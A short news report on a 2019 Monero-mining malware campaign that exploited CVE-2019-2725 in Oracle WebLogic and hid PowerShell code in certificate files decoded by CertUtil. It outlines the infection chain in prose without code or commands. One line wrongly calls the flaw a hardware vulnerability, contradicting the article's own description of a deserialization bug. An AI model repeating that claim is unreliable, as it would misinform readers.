Cybersecurity Report: New Monero Mining Malware Hides within Certificate Files

Monero Mining Chip

The trend of exploitative malware which hides crypto mining bots has started in the past few years and has become one of the most nefariously popular ways to leverage others’ processing power to mine cryptocurrency. Recently, the cybersecurity firm Trend Micro released a security advisory regarding a deserialization vulnerability in Oracle WebLogic Server, which can be exploited for cryptocurrency mining.

In April 2019, Trend Micro detected a series of attacks that leveraged hardware vulnerabilities (dubbed “CVE-2019-2725”) to install a Monero cryptocurrency mining malware. The reports also popped up in the SANS ISC InfoSec forums, which already pointed to the Monero mining malware. After getting confirmation from Trend Micro’s cybersecurity technology, it has been revealed that the Monero malware hides its malicious codes in certificate files as an obfuscation tactic.

As per Trend Micro’s discovery, the Monero malware campaign begins by targeting the CVE-2019-2725 vulnerability on the victim’s computer. Then the malware will exploit it to execute a command for implementing a series of software routines.

Getting Technical with the Monero Mining Malware

First, the PowerShell script would be used to download certificate files from its command-and-control (C&C) server and save it under %APPDATA% using the file name cert.cer.

It will then put CertUtil on work, a component that decodes the certificate file to ultimately reveal a PowerShell command in Windows, to decrypt the file. This resource downloads and executes another PowerShell script from memory that, in turn, downloads and executes various files.

The downloadable files will include Sysupdate.exe, the payload for the Monero miner, Config.json, the config file for the XMR miner, Networkservice.exe, possibly used for the propagation and exploitation of WebLogic, Sysguard .exe that serves as the watchdog for the miner process, Update.ps1, a PowerShell script that executes every 30 seconds and Clean.bat to deletes other components.

Not the First Monero Mining Malware

This isn’t the only case reported regarding a Monero malware in recent months. Previously, Trend Micro discovered BlackSquid, a totally new malware which was capable of exploiting eight notorious vulnerabilities including EternalBlue and DoublePulsar to install the XMRig Monero mining malware. The Nansh0u crypto mining campaign in May 2019 infected more than 50,000 servers by exploiting vulnerabilities.

Trend Micro, in its official blog post, has also suggested several ways to get rid of these malware and how to stay protected against them. The solution includes their own malware protection suit and a few other precautions that users should be aware of.

Sharing Is Caring: